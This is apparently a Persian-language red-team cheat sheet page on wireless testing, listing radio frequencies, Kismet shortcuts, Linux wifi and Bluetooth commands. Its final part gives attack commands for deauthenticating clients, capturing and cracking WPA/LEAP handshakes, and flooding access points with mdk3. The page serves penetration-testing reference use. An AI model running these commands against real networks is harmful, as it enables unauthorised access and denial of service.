تیم قرمز

برگه رمز هایی برای نفوذگران

سرآغاز لینوکس ویندوز شبکه نکات و ترفند ها روش کار با ابزار ها وب پایگاه داده ها برنامه نویسی بی سیم منابع

بی سیم

نمودار فرکانس ها

تکنولوژی فرکانس
RFID

120-150 kHz (LF)

13.56 MHz (HF)

433 MHz (lJHF)

Keyless Entry

315 MHz (N. Am)

433.92 MHz (Europe,Asia)

Cellular (US)

698-894 MHz

1710-1755 MHz

1850-1910 MHz

2110-2155 MHz

GPS 1227.60,1575.42 MHz
L Band 1-2 GHz
802.15.4 (ZigBee)

868 MHz (Europe)

915 MHz (lJS,Australia)

802.15.1 (Bluetooth) 2.4-2.483.5 GHz
802.11 b/g 2.4 GHz
802.11a 5.0 GHz
802.11 n 2.4/5.0 GHZ
C Band 4-8 GHz
Ku Band 12-18 GHz
K Band 18-26.5 GHz
Ka Band 26.5-40 GHz

Fcc id lookup

https://apps.fcc.gov/oetcf/eas/reports/GenericSearch.cfm

پایگاه داده فرکانس ها

http://www.radioreference.com/apps/db/

منبع Kismet

دستور توضیح
e سرور های kismet
h راهنما
z نمایش تمام صفحه
n شماره شبکه فعلی
m حذف صدا
i جزییات شبکه
t تگ و یا حذف تگ شبکه
s مرتبط سازی لیست شبکه
g گروه بندی شبکه های تگ شده
l نمایش سطوح قدرت کارت شبکه بی سیم
u خذف گروه، گروه فعلی
d نمایش تنظیمات قابل نمایش
c نمایش کاربران شبکه فعلی
r نمودار نرخ بسته ها
L قفل نموده کانال در کانال انتخاب شده
a نمایش آمار شبکه
H بازگشت به کانال عادی
p دریافت نوع بسته
+/- Expand/collapse گروه ها
f مرکز شبکه
CTRL+L نمایش دوباره صفحه
w ردیابی هشدار ها
Q خروج از Kismet
X بستن پنجره popup

دستورات wifi در لینوکس

دستور توضیح
iwconfig تنظیمات interface ها
rfkill list نمایش مشکل wifi
rfkill unblock all روشن نموده wifi
airdump-ng mon0 نظارت بر کلیه interface ها

وصل شده به شبکه نا امن

iwconfig ath0 essid $SSID
ifconfig ath0 up
dhclient ath0

اتصال به wep

iwconfig ath0 essid $SSID key
ifconfig ath0 up
dhclient ath0

اتصال به wpa-psk

iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa_supplicant -B -i ath0 -c wpa-psk.conf
dhclient ath0

اتصال به wpa-enterprise

iwconfig ath0 essid $SSID
ifconfig ath0 up
wpa supplicant -B -i ath0 -c wpa-ent.conf
dhclient ath0

بلوتوث در لینوکس

دستور توضیح
hciconfig hci0 up روشن نموده interface بلوتوث
hcitool -i hci0 scan --flush --all جست و جو دستگاه های دارای بلوتوث
sdptool browse BD_ADDR لیست سرویس های باز

hciconfig hci0 name "NAME" class Ox520204

pi scan

انتخاب به عنوان discoverable
pand -K حذف جلسه pand

تست شبکه های wifi در لینوکس

آغاز monitor mode interface

airmon-ng stop ath0
airmon-ng start wifi0
iwconfig ath0 channel $CH

حمله Capture client handshake

airdump-ng -c $CH --bssid $AP -w file athO    #Capture traffic
aireplay-ng -0 10 -a $AP -c $CH athO          #Force client de-auth


حمله Brute force handshake

aircrack-ng -w wordlist capture.cap    # WPA-PSK
asleep -r capture.cap -w dict.asleep   # LEAP
eapmd5pass -r capture.cap -w wordlist  # EAP-HDS



حمله Dos

mdk3    int    a -a $AP    #Auth Flood
mdk3    int    b -c $CH    #Beacon Flood